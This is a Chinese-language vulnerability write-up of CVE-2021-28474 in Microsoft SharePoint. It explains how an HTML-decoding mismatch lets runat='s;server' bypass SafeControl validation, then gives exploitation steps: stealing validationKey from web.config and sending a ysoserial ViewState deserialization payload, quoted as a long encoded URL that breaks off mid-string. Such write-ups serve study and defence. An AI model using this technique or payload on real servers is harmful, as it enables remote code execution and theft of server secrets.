一、CVE-2021-28474 MS SharePoint远程代码执行漏洞
1、漏洞简介
漏洞允许通过身份验证的用户在SharePoint web应用程序的服务账户中执行任意.NET代码。想要利用该漏洞,攻击者需要具备SharePoint站点的SPBasePermissions.ManageLists权限。默认情况下,经过身份验证的SharePoint用户可以创建网页页面,并拥有所需的所有权限。
2、漏洞成因
用于安全验证的代码和实际处理用户输入的代码之间不一致。
EditingPageParser.VerifyControlOnSafeList()提供验证,验证输入是否包含不安全控件,也就是验证web.config文件中SafeControl未将任何控件标记为安全。
EditingPageParser.ParseStringInternal()解析用户输入,寄存器中信息填充hashtable,服务器控件标记中的值填充hashtable2。根据web.config中的SafeControl验证hashtable2,如果有没有被标记为安全的控件,就会抛出异常。
SharePoint只验证服务器端控件带有runat=“server”属性的标记
验证通过SharePoint处理标记。
处理时,text4 = HttpUtility.HtmlDecode(text4)属性值有解析器进行HTML解码,但验证时没有相应行。
加入我们runat=“s;server”,EditingPageParser.VerifyControlOnSafeList()函数不会将其视为服务器端控件,也不会检查它的安全性。但是,在处理时,它将被识别为服务器端控件并执行。
3、漏洞影响范围
Microsoft SharePoint Foundation 2013 Service Pack 1
Microsoft SharePoint Server 2019
Microsoft SharePoint Enterprise Server 2016
4、漏洞利用
普通用户创建站点
指向该站点任何站点页面的相对路径
使用自定义可执行文件向易受攻击的服务器发送请求以触发漏洞。需要提供网站地址、凭证和相对路径。
攻击成功会收到web.config的内容,在web.config中获取validationKey和validationAlg="HMACSHA256"
进入攻击目标的SharePoint,打开C:windows emp文件夹,此时文件夹不存在我们上传的文件。
在攻击者主机上打开success.aspx页面,源代码视图找到__VIEWSTATEGENERATOR
用ysoserial生成ViewState的paylolad,将其作为__VIEWSTATE参数发送到目标服务器
http://sp2019/sites/ts01/_layouts/15/success.aspx?__VIEWSTATE=%2FwEy2gcAAQAAAP%2F%2F%2F%2F8BAAAAAAAAAAwCAAAABlN5c3RlbQUBAAAAQFN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLG1zY29ybGliXV0EAAAABUNvdW50CENvbXBhcmVyB1ZlcnNpb24FSXRlbXMAAQABCAgCAAAAAgAAAAkDAAAAAAAAAAkEAAAABAMAAABAU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuQ29tcGFyaXNvbkNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmddXQEAAAALX2NvbXBhcmlzb24BCQUAAAARBAAAAAIAAAAGBgAAACsvYyBlY2hvIFJDRSA%2BIGM6L3dpbmRvd3MvdGVtcC9TUF9SQ0VfMDEudHh0BgcAAAADY21kBAUAAAAiU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcgMAAAAIRGVsZWdhdGUAAXgBAQEJCAAAAA0ADQAECAAAADBTeXN0ZW0uRGVsZWdhdGVTZ